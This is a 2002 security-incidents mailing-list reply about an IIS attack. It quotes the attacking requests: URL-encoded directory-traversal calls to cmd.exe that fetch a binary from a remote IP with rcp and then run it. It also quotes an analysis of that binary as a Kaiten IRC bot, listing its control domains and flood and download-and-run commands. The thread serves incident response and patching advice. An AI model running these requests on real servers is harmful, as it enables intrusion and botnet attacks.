Security Incidents mailing list archives
Re: new IIS worm? (rcp lsass.exe)
From: "sunzi" <sunzi () mod-x co uk>
Date: Tue, 24 Sep 2002 20:51:24 -0400
HFNetchk written was by Shavlick and is available in Pro version here: http://www.shavlik.com/ Also, I noticed that there having a 'Get HFNetChkLT with Free Patch Pushing' event (http://www.shavlik.com/security/prod_gen_request.asp). There's also Ecor'a Patchmeister (www.ecora.com), which is free, but doesn't support patch pushing AFAIK. cheers, sunzi ----- Original Message ----- From: "zeno" <bugtraq () cgisecurity net> To: "Mark Challender" <MarkC () mtbaker wednet edu> Cc: <pj () esec dk>; <incidents () securityfocus com> Sent: Tuesday, September 24, 2002 2:28 PM Subject: Re: new IIS worm? (rcp lsass.exe)
Hardening of IIS with the tools available at Microsoft and using URLSCAN with the EXE blocking on will stop these attacks. Patch, patch, patch, recheck the patches and use URLSCAN!Does anyone know of a gui windows tool that scans your system and provides
you with a list
of needed patches, and then allows you to select, and have it autodownload
and install them?
I can't seem to find one (needed mostly for iis). - zeno () cgisecurity comMark Challender Network Administrator ================== Veni, Vidi, Geeki ================== -----Original Message----- From: pj () esec dk [mailto:pj () esec dk] Sent: Monday, September 23, 2002 3:27 AM To: incidents () securityfocus com Subject: Re: new IIS worm? (rcp lsass.exe) Christian Mock:Then it seems to go after the web servers, sending the following:GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+
. HTTP/1.0..andGET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0I've been able to get hold of that lsass.exe binary (9728 bytes), but I lack the skills to analyze it; I'll happily mail it to anybody who
asks.
We have seen this attack from 4 different sources since Sept. 16, and
have
informed the owner of 64.21.95.7 and downloaded the lsass.exe for investigation. Based on the attack rate this is most likely a scripted or manual
attack,
not a worm. Judging from the embedded string in this compressed binary it appears
to
be an IRC bot based on the kaiten.c code written by contem@efnet, the author of the Slapper worm : Kaiten Win32 API version 2002 by contem@efnet The binary contains these domainnames, most likeky IRC servers used for controlling the bot: telsa5.mine.nu (Korea) irc.logicfive.net (Taiwan) moncredo.shacknet.nu (USA) telsacredo.shacknet.nu (USA) lar.ath.cx (Taiwan) The program accepts commands to make various DOS attacks or download new version or executables with http: NOTICE %s :PUSH <target> <port> <secs> = A push flooder NOTICE %s :TCP <target> <port> <secs> = A syn flooder NOTICE %s :UDP <target> <port> <secs> = A udp flooder NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder NOTICE %s :NICK <nick> = Changes the nick of the
client
NOTICE %s :DISABLE <pass> = Disables all packeting from
this
client NOTICE %s :ENABLE <pass> = Enables all packeting from
this
client NOTICE %s :UPDATE <http address> = Downloads a file off the web
and
updates the client NOTICE %s :RUN <http address> = Downloads a file off the web
and
runs it NOTICE %s :GET <http address> = Downloads a file off the web NOTICE %s :ADDSERVER <server> = Adds a server to the list NOTICE %s :DELSERVER <server> = Deletes a server from the
list
NOTICE %s :LISTSERVERS = Lists server on the list NOTICE %s :KILL = Kills the client NOTICE %s :VERSION = Requests version of client NOTICE %s :HELP = Displays this There seems also to be a default account and password in the german language included in this specific version of Kaiten. The IIS attack that tries to inject this Trojan usually has another URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an
connection
to port 6667(IRC) on chat.vtm.be. Peter Jelver ... eSec A/S http://www.esec.dk
............................................................................
. PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Re: new IIS worm? (rcp lsass.exe), (continued)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) pj (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Bellenger, Bruno (Paris) (Sep 24)
- Slapper worm DoS james (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Eloy A. Paris (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Mark Challender (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) James Williams (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Ben Timby (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) sunzi (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
(Thread continues...)